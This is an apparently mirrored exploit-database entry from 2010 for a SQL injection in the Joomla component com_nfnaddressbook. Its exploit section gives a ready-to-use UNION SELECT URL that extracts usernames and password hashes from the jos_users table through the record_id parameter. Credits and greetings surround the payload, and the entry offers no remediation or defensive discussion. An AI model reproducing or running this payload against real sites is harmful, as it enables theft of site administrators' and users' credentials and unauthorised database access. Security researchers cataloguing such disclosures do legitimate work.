Joomla! Component com_nfnaddressbook – SQL Injection - 体验盒子

作者： snakespc

日期： 2010-03-14

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11730/

==============================================================================
[»] Joomla com_nfnaddressbook Remote Sql Injection Vulnerability
==============================================================================
 
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder:[ Snakespc Email:super_crist4l@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ DrEadFul, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
 
###########################################################################
 ===[ Exploit ]===
 
[»] http://localhost/joomla/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=-4+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_users--
[»]Author: DrEadFul<-
###########################################################################